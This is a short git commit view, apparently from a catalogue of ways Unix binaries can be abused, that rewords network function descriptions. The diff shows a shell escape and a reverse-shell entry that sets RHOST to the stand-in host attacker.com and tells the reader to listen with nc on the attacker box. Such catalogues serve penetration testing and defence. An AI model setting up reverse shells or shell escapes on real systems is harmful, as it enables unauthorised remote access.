Rephrase network functions descriptions

This commit is contained in:
Emilio Pinna
2018-05-24 21:05:07 +01:00
parent b857c98f92
commit feb07b18fb
13 changed files with 24 additions and 24 deletions

View File

@@ -9,7 +9,7 @@ functions:
^]
!/bin/sh
reverse-shell:
- description: Run `nc -l -p 12345` to receive the shell on the other end.
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345